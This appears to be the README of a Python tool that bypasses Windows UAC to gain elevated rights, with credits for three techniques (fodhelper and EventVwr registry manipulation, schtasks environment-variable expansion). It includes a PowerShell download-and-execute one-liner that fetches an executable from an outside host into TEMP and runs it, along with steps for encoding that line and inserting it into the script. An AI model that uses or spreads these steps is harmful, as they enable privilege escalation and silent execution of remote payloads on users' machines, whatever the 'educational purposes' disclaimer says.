Should work from Windows 7 to Latest Windows 10 FCU (Also works if UAC is Set on High/Always Notify)
Coded by Joel A. Ossi
For the powershell code in the UAC bypass you can use https://raikia.com/tool-powershell-encoder/
and payload: (new-object System.Net.WebClient).DownloadFile('http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe', $env:TEMP + '\putty.exe');Start-Process($env:TEMP + '\putty.exe');
replace YOURCODEHERE in the python file with the encoded output.
you can seet ENABLE_DOWNLOADER to 0 or 1 if you wish to make it Download & Execute or just open Elevated CMD.
Note: all exploits in the python file need the current user to be in Administrators group in order to take advantage of the vulnerability.
Please do not abuse this script, I uploaded this for Educational Purposes Only!
SPECIAL THANKS & EXPLOITS
Type: Shell API
Method: Registry key manipulation
Target(s): \system32\fodhelper.exe
Thanks to: winscripting.blog
Type: Shell API
Method: Environment variables expansion
Target(s): \system32\svchost.exe via \system32\schtasks.exe
Thanks to: James Forshaw
Type: Shell API
Method: Registry key manipulation
Target(s): \system32\EventVwr.exe
Thanks to: Enigma0x3